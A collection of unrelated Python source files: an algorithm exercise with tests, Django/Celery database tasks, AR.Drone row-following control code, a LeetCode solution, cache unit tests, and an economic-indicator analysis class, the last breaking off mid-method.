if len(arr) == 0:
return 0
max_sum = current_sum = arr[0]
for num in arr[1:]:
current_sum = max(current_sum + num, num)
max_sum = max(current_sum, max_sum)
return max_sum
large_cont_sum2([1,2,-1,3,4,10,10,-10,-1])
# pip install nose
# test cases
from nose.tools import assert_equal
class LargeContTest(object):
def test(self,sol):
assert_equal(sol([1,2,-1,3,4,-1]),9)
assert_equal(sol([1,2,-1,3,4,10,10,-10,-1]),29)
assert_equal(sol([-1,1]),1)
print ('ALL TEST CASES PASSED')
#Run Test
t = LargeContTest()
t.test(large_cont_sum2) |
from datetime import datetime
from celery import shared_task
from django.db import connections
from scripts.helpers import ordered_query_iterator
from capdb.models import *
def sync_case_body_cache_for_all_vols():
"""
Call sync_case_body_cache_for_vol celery task for each volume
"""
for volume_id in VolumeMetadata.objects.exclude(xml_metadata=None).values_list('pk', flat=True):
sync_case_body_cache_for_vol.delay(volume_id)
@shared_task
def sync_case_body_cache_for_vol(volume_id):
"""
create or update cases for each volume
"""
volume = VolumeMetadata.objects.get(pk=volume_id)
pages = list(volume.page_structures.all())
blocks_by_id = PageStructure.blocks_by_id(pages)
fonts_by_id = CaseFont.fonts_by_id(blocks_by_id)
labels_by_block_id = PageStructure.labels_by_block_id(pages)
for case_metadata in volume.case_metadatas.select_related('structure'):
case_metadata.sync_case_body_cache(blocks_by_id, fonts_by_id, labels_by_block_id)
def create_case_metadata_from_all_vols(update_existing=False):
"""
iterate through all volumes, call celery task for each volume
"""
query = VolumeXML.objects.all()
# if not updating existing, then only launch jobs for volumes with unindexed cases:
if not update_existing:
query = query.filter(case_xmls__metadata_id=None).distinct()
# launch a job for each volume:
for volume_id in query.values_list('pk', flat=True):
create_case_metadata_from_vol.delay(volume_id, update_existing=update_existing)
@shared_task
def create_case_metadata_from_vol(volume_id, update_existing=False):
"""
create or update cases for each volume
"""
case_xmls = CaseXML.objects\
.filter(volume_id=volume_id)\
.select_related('metadata', 'volume__metadata__reporter')\
.defer('orig_xml', 'volume__orig_xml')
if not update_existing:
case_xmls = case_xmls.filter(metadata_id=None)
for case_xml in case_xmls:
case_xml.create_or_update_metadata(update_existing=update_existing)
@shared_task
def update_volume_metadata(volume_xml_id):
VolumeXML.objects.get(pk=volume_xml_id).update_metadata()
@shared_task
def test_slow(i, ram=10, cpu=30):
"""
Allocate `ram` megabytes of ram and run `cpu` million additions.
"""
print("Task %s" % i)
# waste 0-ram MB of RAM
waste_ram = bytearray(2**20 * ram) # noqa
# waste CPU
total = 0
for i in range(cpu * 1000000):
total += i
@shared_task
@transaction.atomic
def fix_md5_column(volume_id):
"""
Our database has xml fields in the casexml and pagexml tables that are missing the <?xml> declaration, and that also don't have the md5 column filled.
Here we update all the xml fields to add the <?xml> declaration and md5 hash.
"""
with connections['capdb'].cursor() as cursor:
new_xml_sql = "E'<?xml version=''1.0'' encoding=''utf-8''?>\n' || orig_xml"
for table in ('capdb_casexml', 'capdb_pagexml'):
print("Volume %s: updating %s" % (volume_id, table))
update_sql = "UPDATE %(table)s SET orig_xml=xmlparse(CONTENT %(new_xml)s), md5=md5(%(new_xml)s) where volume_id = %%s and md5 is null" % {'table':table, 'new_xml':new_xml_sql}
cursor.execute(update_sql, [volume_id])
@shared_task
def get_reporter_count_for_jur(jurisdiction_id):
"""
Count reporters through the years per jurisdiction. Include totals.
"""
if not jurisdiction_id:
print('Must provide jurisdiction id')
return
with connections['capdb'].cursor() as cursor:
cursor.execute("select r.id, r.start_year, r.full_name, r.volume_count from capdb_reporter r join capdb_reporter_jurisdictions j on (r.id = j.reporter_id) where j.jurisdiction_id=%s order by r.start_year;" % jurisdiction_id)
db_results = cursor.fetchall()
results = {
'total': 0,
'years': {},
'firsts': {
'name': '',
'id': ''
}
}
try:
results['firsts']['name'] = db_results[0][2]
results['firsts']['id'] = db_results[0][0]
except IndexError:
pass
for res in db_results:
rep_id, start_year, full_name, volume_count = res
if start_year in results:
results['years'][start_year] += 1
else:
results['years'][start_year] = 1
results['total'] += 1
results['recorded'] = str(datetime.now())
return results
@shared_task
def get_case_count_for_jur(jurisdiction_id):
if not jurisdiction_id:
print('Must provide jurisdiction id')
return
with connections['capdb'].cursor() as cursor:
cursor.execute("select extract(year from decision_date)::integer as case_year, count(*) from capdb_casemetadata where duplicative=false and jurisdiction_id=%s group by case_year;" % jurisdiction_id)
db_results = cursor.fetchall()
results = {
'total': 0,
'years': {},
'firsts': {
'name_abbreviation': '',
'name': '',
'id': ''
}
}
first_case = CaseMetadata.objects.filter(jurisdiction_id=jurisdiction_id).order_by('decision_date').first()
if first_case:
results['firsts']['name_abbreviation'] = first_case.name_abbreviation
results['firsts']['name'] = first_case.name
results['firsts']['id'] = first_case.id
for res in db_results:
case_year, count = res
results['years'][case_year] = count
results['total'] += count
results['recorded'] = str(datetime.now())
return results
@shared_task
def get_court_count_for_jur(jurisdiction_id):
if not jurisdiction_id:
print("Must provide jurisdiction id")
return
jur = Jurisdiction.objects.get(id=jurisdiction_id)
results = {
'recorded': str(datetime.now()),
'total': jur.courts.count()
}
return results
def create_case_text_for_all_cases(update_existing=False):
"""
iterate through all volumes, call celery task for each volume
"""
query = VolumeMetadata.objects.all()
# launch a job for each volume:
for volume_id in query.values_list('pk', flat=True):
create_case_text.delay(volume_id, update_existing=update_existing)
@shared_task
def create_case_text(volume_id, update_existing=False):
"""
create or update cases for each volume
"""
cases = CaseMetadata.objects\
.in_scope() \
.order_by('id')\
.filter(volume_id=volume_id)\
.select_related('case_xml', 'case_text')
if not update_existing:
cases = cases.filter(case_text=None)
for case in ordered_query_iterator(cases):
case.create_or_update_case_text()
|
#!/usr/bin/python
"""
Field Robot Event 2014 (ver0 - autonomous landing on heliport sign)
usage:
./fre_drone.py <task>
"""
import sys
import datetime
import multiprocessing
import cv2
import math
import numpy as np
from pave import PaVE, isIFrame, frameNumber, timestamp, correctTimePeriod, frameEncodedWidth, frameEncodedHeight
from sourcelogger import SourceLogger
from ardrone2 import ARDrone2, ManualControlException, manualControl, normalizeAnglePIPI, distance
import viewlog
from line import Line
from pose import Pose
from green import processAvoidGreen
import cvideo
#from rr_drone import downloadOldVideo
MAX_ALLOWED_SPEED = 0.8
ROW_WIDTH = 0.75 #0.4
###### -------------------- ready for major refactoring -------------------------
def timeName( prefix, ext ):
dt = datetime.datetime.now()
filename = prefix + dt.strftime("%y%m%d_%H%M%S.") + ext
return filename
g_pave = None
g_img = None
def wrapper( packet ):
global g_pave
global g_img
if g_pave == None:
g_pave = PaVE()
cvideo.init()
g_img = np.zeros([360,640,3], dtype=np.uint8)
g_pave.append( packet )
header,payload = g_pave.extract()
while payload:
if isIFrame( header ):
w,h = frameEncodedWidth(header), frameEncodedHeight(header)
if g_img.shape[0] != h or g_img.shape[1] != w:
print g_img.shape, (w,h)
g_img = np.zeros([h,w,3], dtype=np.uint8)
ret = cvideo.frame( g_img, isIFrame(header) and 1 or 0, payload )
frame = g_img
assert ret
if ret:
result = processAvoidGreen( frame, debug=False )
return (frameNumber( header ), timestamp(header)), result
header,payload = g_pave.extract()
g_queueResults = multiprocessing.Queue()
def getOrNone():
if g_queueResults.empty():
return None
return g_queueResults.get()
###### --------------------------------------------------------------------------
# TODO for bottom cammera (!)
def project2plane( imgCoord, coord, height, heading, angleFB, angleLR ):
FOW = math.radians(70)
EPS = 0.0001
x,y = imgCoord[0]-1280/2, 720/2-imgCoord[1]
angleLR = -angleLR # we want to compensate the turn
x,y = x*math.cos(angleLR)-y*math.sin(angleLR), y*math.cos(angleLR)+x*math.sin(angleLR)
h = -x/1280*FOW + heading
tilt = y/1280*FOW + angleFB
if tilt > -EPS:
return None # close to 0.0 AND projection behind drone
dist = height/math.tan(-tilt)
return (coord[0]+math.cos(h)*dist , coord[1]+math.sin(h)*dist)
class FieldRobotDrone( ARDrone2 ):
def __init__( self, replayLog=None, speed = 0.2, skipConfigure=False, metaLog=None, console=None ):
self.loggedVideoResult = None
self.lastImageResult = None
self.videoHighResolution = False
ARDrone2.__init__( self, replayLog, speed, skipConfigure, metaLog, console )
if replayLog == None:
name = timeName( "logs/src_cv2_", "log" )
metaLog.write("cv2: "+name+'\n' )
self.loggedVideoResult = SourceLogger( getOrNone, name ).get
self.startVideo( wrapper, g_queueResults, record=True, highResolution=self.videoHighResolution )
else:
assert metaLog
self.loggedVideoResult = SourceLogger( None, metaLog.getLog("cv2:") ).get
self.startVideo( record=True, highResolution=self.videoHighResolution )
def update( self, cmd="AT*COMWDG=%i,\r" ):
ARDrone2.update( self, cmd )
if self.loggedVideoResult != None:
self.lastImageResult = self.loggedVideoResult()
def stayAtPosition( drone, desiredHeight = 1.5, timeout = 10.0 ):
maxControlGap = 0.0
desiredSpeed = MAX_ALLOWED_SPEED
refPoint = (0,0)
foundTagTime = None
searchSeq = [(0,0), (2,0), (0,-2), (-2,0), (0,2), (0,0)]
startTime = drone.time
sx,sy,sz,sa = 0,0,0,0
stepTime = drone.time
while drone.time < startTime + timeout:
altitude = desiredHeight
if drone.altitudeData != None:
altVision = drone.altitudeData[0]/1000.0
altSonar = drone.altitudeData[3]/1000.0
altitude = (altSonar+altVision)/2.0
# TODO selection based on history? panic when min/max too far??
if abs(altSonar-altVision) > 0.5:
print altSonar, altVision
altitude = max( altSonar, altVision ) # sonar is 0.0 sometimes (no ECHO)
sz = max( -0.2, min( 0.2, desiredHeight - altitude ))
if altitude > 2.5:
# wind and "out of control"
sz = max( -0.5, min( 0.5, desiredHeight - altitude ))
sx = 0.0 #max( 0, min( drone.speed, desiredSpeed - drone.vx ))
# tiltCompensation = Pose(desiredHeight*oldAngles[0], desiredHeight*oldAngles[1], 0) # TODO real height?
# print "FRAME", frameNumber/15, "[%.1f %.1f]" % (math.degrees(oldAngles[0]), math.degrees(oldAngles[1])),
# if drone.battery < 10:
# print "BATTERY LOW!", drone.battery
# error definition ... if you substract that you get desired position or angle
# error is taken from the path point of view, x-path direction, y-positive left, angle-anticlockwise
errX, errY, errA = 0.0, 0.0, 0.0
# if refLine:
# errY = refLine.signedDistance( drone.coord )
# errA = normalizeAnglePIPI( drone.heading - refLine.angle )
if len(drone.visionTag) > 0:
SCALE = 0.17/(2*74)
tagX, tagY, tagDist = drone.visionTag[0][0], drone.visionTag[0][1], drone.visionTag[0][4]/100.0
tiltCompensation = Pose(tagDist*drone.angleFB, tagDist*drone.angleLR, 0)
pose = Pose(drone.coord[0], drone.coord[1], drone.heading).add(tiltCompensation)
offset = Pose(tagDist*(480-tagY)*SCALE, tagDist*(tagX-640)*SCALE, 0.0)
pose = pose.add( offset )
refPoint = (pose.x, pose.y)
if foundTagTime == None:
print drone.visionTag
print "%.2f\t%.2f\t%.2f\t%.1f\t%.1f" % (drone.time, tagDist*(tagY-480)*SCALE, tagDist*(tagX-640)*SCALE, math.degrees(drone.angleFB), math.degrees(drone.angleLR))
print refPoint
foundTagTime = drone.time
else:
if foundTagTime != None and drone.time - foundTagTime > 3.0:
foundTagTime = None
print "LOST TAG"
searchSeq = [(x+drone.coord[0], y+drone.coord[1]) for (x,y) in [(0,0), (2,0), (0,-2), (-2,0), (0,2), (0,0)]]
if foundTagTime == None and len(searchSeq) > 0 and drone.time - stepTime > 3.0:
refPoint = searchSeq[0]
searchSeq = searchSeq[1:]
print "STEP", refPoint
stepTime = drone.time
if refPoint:
pose = Pose(drone.coord[0], drone.coord[1], drone.heading)
landPose = Pose( refPoint[0], refPoint[1], drone.heading ) # ignore heading for the moment
diff = pose.sub( landPose )
#print diff
errX, errY = diff.x, diff.y
# get the height first
# if drone.coord[2] < desiredHeight - 0.1 and drone.time-startTime < 5.0:
# sx = 0.0
# error correction
# the goal is to have errY and errA zero in 1 second -> errY defines desired speed at given distance from path
sx = max( -0.2, min( 0.2, -errX-drone.vx ))/2.0
sy = max( -0.2, min( 0.2, -errY-drone.vy ))/2.0
# there is no drone.va (i.e. derivative of heading) available at the moment ...
sa = max( -0.1, min( 0.1, -errA/2.0 ))*1.35*(desiredSpeed/0.4) # originally set for 0.4=OK
# print "%0.2f\t%d\t%0.2f\t%0.2f\t%0.2f" % (errY, int(math.degrees(errA)), drone.vy, sy, sa)
prevTime = drone.time
drone.moveXYZA( sx, sy, sz, sa )
maxControlGap = max( drone.time - prevTime, maxControlGap )
return maxControlGap
def groundPose( (x,y), (xBottom,yBottom), scale ):
a = math.atan2( xBottom-x, yBottom-y )
return Pose( scale*(360/2-y), scale*(640/2-x), a )
def evalRowData( rowTopBottom ):
(xL,xR),(xbL,xbR) = rowTopBottom
if min(xL,xbL) > 0 and max(xR,xbR) < 640:
widthTop, widthBottom = xR-xL, xbR-xbL
if min(widthTop, widthBottom) > 150 and max(widthTop, widthBottom) < 350:
return (xL+xR)/2, (xbL+xbR)/2
def followRow( drone, desiredHeight = 1.5, timeout = 10.0 ):
maxControlGap = 0.0
maxVideoDelay = 0.0
desiredSpeed = MAX_ALLOWED_SPEED
startTime = drone.time
sx,sy,sz,sa = 0,0,0,0
lastUpdate = None
refLine = None
while drone.time < startTime + timeout:
altitude = desiredHeight
if drone.altitudeData != None:
altVision = drone.altitudeData[0]/1000.0
altSonar = drone.altitudeData[3]/1000.0
altitude = (altSonar+altVision)/2.0
# TODO selection based on history? panic when min/max too far??
if abs(altSonar-altVision) > 0.5:
# print altSonar, altVision
altitude = max( altSonar, altVision ) # sonar is 0.0 sometimes (no ECHO)
sz = max( -0.2, min( 0.2, desiredHeight - altitude ))
if altitude > 2.5:
# wind and "out of control"
sz = max( -0.5, min( 0.5, desiredHeight - altitude ))
if drone.lastImageResult:
lastUpdate = drone.time
assert len( drone.lastImageResult ) == 2 and len( drone.lastImageResult[0] ) == 2, drone.lastImageResult
(frameNumber, timestamp), rowTopBottom = drone.lastImageResult
viewlog.dumpVideoFrame( frameNumber, timestamp )
# keep history small
videoTime = correctTimePeriod( timestamp/1000., ref=drone.time )
videoDelay = drone.time - videoTime
if videoDelay > 1.0:
print "!DANGER! - video delay", videoDelay
maxVideoDelay = max( videoDelay, maxVideoDelay )
toDel = 0
for oldTime, oldPose, oldAngles in drone.poseHistory:
toDel += 1
if oldTime >= videoTime:
break
drone.poseHistory = drone.poseHistory[:toDel]
tiltCompensation = Pose(desiredHeight*oldAngles[0], desiredHeight*oldAngles[1], 0) # TODO real height?
validRow = evalRowData( rowTopBottom )
print "FRAME", frameNumber/15, "[%.1f %.1f]" % (math.degrees(oldAngles[0]), math.degrees(oldAngles[1])), validRow
if validRow:
sp = groundPose( *rowTopBottom, scale=ROW_WIDTH/((validRow[0]+validRow[1])/2.0))
sPose = Pose( *oldPose ).add(tiltCompensation).add( sp )
refLine = Line( (sPose.x,sPose.y), (sPose.x + math.cos(sPose.heading), sPose.y + math.sin(sPose.heading)) )
errY, errA = 0.0, 0.0
if refLine:
errY = refLine.signedDistance( drone.coord )
errA = normalizeAnglePIPI( drone.heading - refLine.angle )
sx = max( 0, min( drone.speed, desiredSpeed - drone.vx ))
sy = max( -0.2, min( 0.2, -errY-drone.vy ))/2.0
sa = max( -0.1, min( 0.1, -errA/2.0 ))*1.35*(desiredSpeed/0.4)
prevTime = drone.time
drone.moveXYZA( sx, sy, sz, sa )
drone.poseHistory.append( (drone.time, (drone.coord[0], drone.coord[1], drone.heading), (drone.angleFB, drone.angleLR)) )
maxControlGap = max( drone.time - prevTime, maxControlGap )
return maxControlGap
def competeFieldRobot( drone, desiredHeight = 1.5 ):
drone.speed = 0.1
maxVideoDelay = 0.0
maxControlGap = 0.0
try:
drone.wait(1.0)
drone.setVideoChannel( front=False )
drone.takeoff()
drone.poseHistory = []
print "NAVI-ON"
startTime = drone.time
# maxControlGap = stayAtPosition( drone, desiredHeight=desiredHeight, timeout=30.0 )
maxControlGap = followRow( drone, desiredHeight=desiredHeight, timeout=25.0 )
lastUpdate = None
print "NAVI-OFF", drone.time - startTime
drone.hover(0.5)
drone.land()
drone.setVideoChannel( front=True )
except ManualControlException, e:
print "ManualControlException"
if drone.ctrlState == 3: # CTRL_FLYING=3 ... i.e. stop the current motion
drone.hover(0.1)
drone.land()
drone.wait(1.0)
drone.stopVideo()
# print "MaxVideoDelay", maxVideoDelay
print "MaxControlGap", maxControlGap
print "Battery", drone.battery
if __name__ == "__main__":
if len(sys.argv) > 2 and sys.argv[1] == "img":
imgmain( sys.argv[1:], processFrame )
sys.exit( 0 )
import launcher
launcher.launch( sys.argv, FieldRobotDrone, competeFieldRobot )
|
# -*- coding: utf-8 -*-
'''
https://leetcode.com/problems/add-digits/
'''
class Solution(object):
def addDigits(self, num):
"""
:type num: int
:rtype: int
"""
if not num:
return 0
result = num % 9
if not result:
result = 9
return result
|
import os
import pytest
from twindb_backup.cache.cache import Cache, CacheException
def test_init_raises_exception():
with pytest.raises(CacheException):
Cache('foo')
def test_in(cache_dir):
c = Cache(str(cache_dir))
assert 'bar' not in c
cache_dir.mkdir('foo')
assert 'foo' in c
def test_add(cache_dir, tmpdir):
c = Cache(str(cache_dir))
item = str(tmpdir.mkdir('foo'))
assert item not in c
c.add(item)
assert 'foo' in c
def test_add_with_key(cache_dir, tmpdir):
c = Cache(str(cache_dir))
item = str(tmpdir.mkdir('foo'))
assert item not in c
c.add(item, 'bar')
assert 'bar' in c
def test_purge(cache_dir):
c = Cache(str(cache_dir))
cache_dir.mkdir('foo')
cache_dir.mkdir('bar')
assert 'foo' in c
assert 'bar' in c
print(os.listdir(str(cache_dir)))
c.purge()
assert 'foo' not in c
assert 'bar' not in c
assert os.path.exists(str(cache_dir))
def test_restore_in(cache_dir, tmpdir):
c = Cache(str(cache_dir))
item = tmpdir.mkdir('foo')
ib = item.join('ibdata1')
ib.write('content')
assert os.path.exists(str(ib))
md = item.mkdir('mysql')
assert os.path.exists(str(md))
c.add(str(item))
dst = str(tmpdir.mkdir('dst'))
c.restore_in('foo', dst)
assert os.path.exists(os.path.join(dst, 'ibdata1'))
assert os.path.exists(os.path.join(dst, 'mysql'))
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 20 23:05:15 2018
@author: Thomas Atta-Fosu (attafosu@yahoo.com)
"""
import pandas as pd
import datetime
import numpy as np
from matplotlib import pylab as plt
from matplotlib import dates as mdates
from dateutil import relativedelta
#%% Recession Months
Recessions = {1949: (datetime.date(1948, 11, 30), datetime.date(1949, 10, 1)),
1953: (datetime.date(1953, 7, 31), datetime.date(1954, 5, 1)),
1958: (datetime.date(1957, 8, 31), datetime.date(1958, 4, 1)),
1960: (datetime.date(1960, 4, 30), datetime.date(1961, 2, 1)),
1969: (datetime.date(1969, 12, 31), datetime.date(1970, 11, 1)),
1973: (datetime.date(1973, 11, 30), datetime.date(1975, 3, 1)),
1980: (datetime.date(1980, 1, 31), datetime.date(1980, 7, 1)),
1981: (datetime.date(1981, 7, 31), datetime.date(1982, 11, 1)),
1990: (datetime.date(1990, 7, 31), datetime.date(1991, 3, 1)),
2001: (datetime.date(2001, 3, 31), datetime.date(2001, 11, 1)),
2007: (datetime.date(2007, 12, 31), datetime.date(2009, 6, 1))}
#%% Graph class
class DoubleLineGraphs:
def __init__(self, data_path):
self.Recessions = Recessions
self.data = data_path
xls = pd.ExcelFile(self.data)
# try:
# xls = pd.ExcelFile(self.data)
# except:
# print("Cannot open file. Make sure file exists")
# return
#
try:
self.LEI = xls.parse("LEI Year over Year Change").get_values()
except:
print("Spreadsheet does not have sheet named 'LEI Year over Year Change'. Cannot plot LEI graphs")
self.PMI = xls.parse('PMI',header=None).get_values()
self.CC = xls.parse('Consumer Confidence',header=None).get_values() #Consumer Confidence
self.CEOC = xls.parse('CEO Confidence',header=None).get_values() # CEO Confidence
self.HBC = xls.parse('Home Builder Confidence',header=None).get_values()
self.SBO = xls.parse('Small Business Optimism',header=None).get_values()
self.HYS = xls.parse('HY Spreads',header=None).get_values()
self.CPI = xls.parse('Core CPI',header=None).get_values()
self.GDP = xls.parse('Real GDP YoY',header=None).get_values()
self.NYFED = xls.parse('New York Fed Underlying Inf',header=None).get_values()
self.CU = xls.parse('Capacity Utilization',header=None).get_values()
#%%
def coreCPIvCapacityUtil(self, cpi_start_date=datetime.date(1998, 1,1),
cu_lag_months = 1):
cu_start_date = cpi_start_date - relativedelta.relativedelta(months=cu_lag_months)
cu = {}
cpi = {}
for ss in range(self.CU.shape[0]):
date = self.CU[ss,0]
if not isinstance(date,datetime.date) or date.date() < cu_start_date:
continue
lag_date = date + relativedelta.relativedelta(months=16)
cu[lag_date] = self.CU[self.CU[:,0]==date,1][0]
for ss in range(self.CPI.shape[0]):
date = self.CPI[ss,0]
if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
continue
cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
lcpi = sorted(cpi.items())
lcu = sorted(cu.items())
xcpi, ycpi = zip(*lcpi)
xcu, ycu = zip(*lcu)
self.xcpi , self.ycpi = xcpi, ycpi
self.xcu, self.ycu = xcu, ycu
ser_cpi = pd.Series(ycpi, index=xcpi)
ser_cu = pd.Series(ycu, index=xcu)
res_cpi = ser_cpi.resample('D').interpolate(method='linear')
res_cu = ser_cu.resample('D').interpolate(method='linear')
start_date = max([min(res_cpi.index),min(res_cu.index)])
end_date = min([max(res_cpi.index),max(res_cu.index)])
self.res_cpi = res_cpi.loc[start_date:end_date]
self.res_cu = res_cu.loc[start_date:end_date]
# self.res_cpi.plot()
self.cpi_caputil_cor = np.corrcoef(self.res_cpi, self.res_cu)
#%% CPI vs PMI
def coreCPIvsISMPMI(self, cpi_start_date = datetime.date(1998, 1, 1), pmi_lag_months=21):
self.pmi = {}
self.cpi = {}
pmi_start_date = cpi_start_date - relativedelta.relativedelta(months=pmi_lag_months)
for ss in range(self.PMI.shape[0]):
date = self.PMI[ss,0]
if not isinstance(date,datetime.date) or date.date() < pmi_start_date:
continue
lag_date = date + relativedelta.relativedelta(months=23)
self.pmi[lag_date] = self.PMI[self.PMI[:,0]==date,1][0]
for ss in range(self.CPI.shape[0]):
date = self.CPI[ss,0]
if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
continue
self.cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
lcpi = sorted(self.cpi.items())
lpmi = sorted(self.pmi.items())
self.xcpi, self.ycpi = zip(*lcpi)
self.xpmi, self.ypmi = zip(*lpmi)
imdates = set(self.xcpi).intersection(self.xpmi)
ser_cpi = pd.Series(self.ycpi, index=self.xcpi)
ser_pmi = pd.Series(self.ypmi, index=self.xpmi)
# res_cpi = ser_cpi.resample('3D').interpolate(method='linear')
# res_pmi = ser_pmi.resample('3D').interpolate(method='linear')
#
# start_date = max([min(res_cpi.index),min(res_pmi.index)])
# end_date = min([max(res_cpi.index),max(res_pmi.index)])
self.res_cpi = ser_cpi.loc[imdates]
self.res_pmi = ser_pmi.loc[imdates]
# self.res_pmi.plot()
self.cpi_pmi_cor = np.corrcoef(self.res_cpi, self.res_pmi)
#%%
def confidenceScores(self,):
ncc = {}
nceoc = {}
nhbc = {}
nsbo = {}
meanConf = {}
self.zcc = {}
self.zceoc = {}
self.zhbc = {}
self.zsbo = {}
self.zmeanconf = {}
for ss in range(self.CEOC.shape[0]):
date = self.CEOC[ss,0]
if not isinstance(date,datetime.date):
continue
cc = self.CC[self.CC[:,0]==date,1][0]
ceoc = 10*self.CEOC[self.CEOC[:,0]==date,1][0]
hbc = self.HBC[self.HBC[:,0]==date,1][0]
sbo = self.SBO[self.SBO[:,0]==date,1][0]
meanConf[date] = np.mean(np.asarray([cc,ceoc,hbc,sbo]))
ncc[date] = cc
nceoc[date] = ceoc
nhbc[date] = hbc
nsbo[date] = sbo
for date in ncc.keys():
cc = (ncc[date] - np.mean(list(ncc.values())))/np.std(list(ncc.values()))
ceoc = (nceoc[date] - np.mean(list(nceoc.values())))/np.std(list(nceoc.values()))
hbc = (nhbc[date] - np.mean(list(nhbc.values())))/np.std(list(nhbc.values()))
sbo = (nsbo[date] - np.mean(list(nsbo.values())))/np.std(list(nsbo.values()))
self.zmeanconf[date] = np.mean(np.asarray([cc,ceoc,hbc,sbo]))
self.zcc[date] = cc
self.zceoc[date] = ceoc
self.zhbc[date] = hbc
self.zsbo[date] = sbo
#%%
def HighYeildSpread(self, scope, data_end_date=datetime.date(2018, 4, 17)):
# scope ---> How far out to track (for High yield spreads, this is no. of days)
# data_end_date ----> Latest month
# trending_year_start_date = data_end_date.replace(year=data_end_date.year-1) # 1 year ago
#print("data_end_date: {}".format(data_end_date))
# current_1year_trend = {} # to store the preceding year's data
self.HYscope = scope
self.one_year_to_recession = {}
self.six_mos_to_recession = {}
self.recession_2001 = {}
self.recession_2007 = {}
for d in range(1,self.HYS.shape[0]):
day = self.HYS[d,0]
if isinstance(day,float):
continue
if 'Date' in day:
continue
if '/' not in day:
continue
#ymd = day.split('/')
date = datetime.datetime.strptime(day,'%m/%d/%Y').date()#datetime.date(int(ymd[2]), int(ymd[0]), int(ymd[1]))
# Saving past year trends
if abs((Recessions[2001][0] - date).days) < scope:
timediff2001 = (date - Recessions[2001][0]).days
self.recession_2001[timediff2001] = self.HYS[self.HYS[:,0]==day, 1][0]
elif abs((Recessions[2007][0] - date).days) < scope:
timediff2007 = (date - Recessions[2007][0]).days
self.recession_2007[timediff2007] = self.HYS[self.HYS[:,0]==day, 1][0]
else:
timediff = (data_end_date - date).days
if (timediff < scope) and (timediff > 120):
self.six_mos_to_recession[-timediff] = self.HYS[self.HYS[:,0]==day, 1][0]
if (timediff <=365) and (timediff>120):
self.one_year_to_recession[-timediff] = self.HYS[self.HYS[:,0]==day, 1][0]
#%% Leading Economic Indicator
def leadingEconomicIndicators(self,scope, trending_year=1):
# scope ---> How far out to track
# trending_year ---> current period in perspective
months_to_and_after = dict((el, []) for el in range(-scope, scope+1, 1)) # To store the leadinng months
end_date = datetime.datetime(1920,1,1,0,0) # To get end date
for year in Recessions.keys():
start_date = Recessions[year][0]
for d in range(self.LEI.shape[0]):
date = self.LEI[d,0]
if not isinstance(date,datetime.date):
continue
if abs((date.date() - start_date)).days <= (scope)*31:
timediff = (date.date() - start_date).days
if abs(timediff)<155:
timediff = np.sign(timediff)*round((abs(timediff)/28))
else:
timediff = np.sign(timediff)*round((abs(timediff)/30))
# if timediff==0:
# print(date)
val = self.LEI[self.LEI[:,0]==date, 1]
months_to_and_after[timediff].append( val[0] )
if end_date < date:
end_date = date
#%% Do some stats
# stats are 25th percentile, mean and 75th percentile
mean_vals = {}
prctile_25 = {}
prctile_75 = {}
for lag_month in months_to_and_after.keys():
vals = np.asarray(months_to_and_after[lag_month])
mean_vals[lag_month] = np.mean(vals)
prctile_25[lag_month] = np.percentile(vals, 25)
prctile_75[lag_month] = np.percentile(vals, 75)
#%% Current year trend stats
data_end_date = end_date#self.LEI[self.LEI[:,0]=='End Date',1][0] # Get latest month
trending_year_start_date = data_end_date.replace(year=data_end_date.year-trending_year) # tracking period ago
current_1year_trend = {} # to store the preceding year's data
for d in range(self.LEI.shape[0]):
date = self.LEI[d,0]
if not isinstance(date,datetime.date):
continue
# Saving past year trends
if (date <= data_end_date) and (date >= trending_year_start_date):
timediff = (data_end_date - date).days
if timediff<155:
timediff = np.sign(timediff)*(abs(timediff)/28)
else:
timediff = np.sign(timediff)*(abs(timediff)/30)
# subtract 12 if you do
current_1year_trend[-timediff-12] = self.LEI[self.LEI[:,0]==date, 1][0]
self.leimean = sorted(mean_vals.items())
self.lei25 = sorted(prctile_25.items())
self.lei75 = sorted(prctile_75.items())
self.leicurr = sorted(current_1year_trend.items())
#%% ISM PMI leading to recession
def pmiLeadingToRecession(self, scope, trending_year=1):
# scope ---> How far out to track
# trending_year ----> current period in focus
months_to_and_after = dict((el, []) for el in range(-scope, scope+1, 1)) # To store the leadinng months
end_date = datetime.datetime(1920,1,1,0,0)
for year in Recessions.keys():
start_date = Recessions[year][0]
for d in range(self.PMI.shape[0]):
date = self.PMI[d,0]
if not isinstance(date,datetime.date):
continue
if abs((date.date() - start_date)).days <= (scope)*31:
timediff = (date.date() - start_date).days
if abs(timediff)<155:
timediff = np.sign(timediff)*round((abs(timediff)/28))
else:
timediff = np.sign(timediff)*round((abs(timediff)/30))
# if timediff==0:
# print(date)
val = self.PMI[self.PMI[:,0]==date, 1]
months_to_and_after[timediff].append( val[0] )
if end_date < date:
end_date = date
#%% Do some stats
# stats are 25th percentile, mean and 75th percentile
mean_vals = {}
prctile_25 = {}
prctile_75 = {}
for lag_month in months_to_and_after.keys():
vals = np.asarray(months_to_and_after[lag_month])
mean_vals[lag_month] = np.mean(vals)
prctile_25[lag_month] = np.percentile(vals, 25)
prctile_75[lag_month] = np.percentile(vals, 75)
#%% Current year trend stats
data_end_date = end_date#self.PMI[self.PMI[:,0]=='End Date',1][0] # Get latest month
trending_year_start_date = data_end_date.replace(year=data_end_date.year-1) # 1 year ago
current_1year_trend = {} # to store the preceding year's data
for d in range(self.PMI.shape[0]):
date = self.PMI[d,0]
if not isinstance(date,datetime.date):
continue
# Saving past year trends
if (date <= data_end_date) and (date >= trending_year_start_date):
timediff = (data_end_date - date).days
if timediff<155:
timediff = np.sign(timediff)*(abs(timediff)/28)
else:
timediff = np.sign(timediff)*(abs(timediff)/30)
current_1year_trend[-timediff-12] = self.PMI[self.PMI[:,0]==date, 1][0]
self.pmimean = sorted(mean_vals.items())
self.pmi25 = sorted(prctile_25.items())
self.pmi75 = sorted(prctile_75.items())
self.pmicurr = sorted(current_1year_trend.items())
#%%
def coreCPIvsNYFED(self, cpi_start_date=datetime.date(1998, 1, 1), nyfed_lag_months=16):
nyfed_start_date = cpi_start_date - relativedelta.relativedelta(months=16)
nyfed = {}
cpi = {}
for ss in range(self.NYFED.shape[0]):
date = self.NYFED[ss,0]
if not isinstance(date,datetime.date) or date.date() < nyfed_start_date:
continue
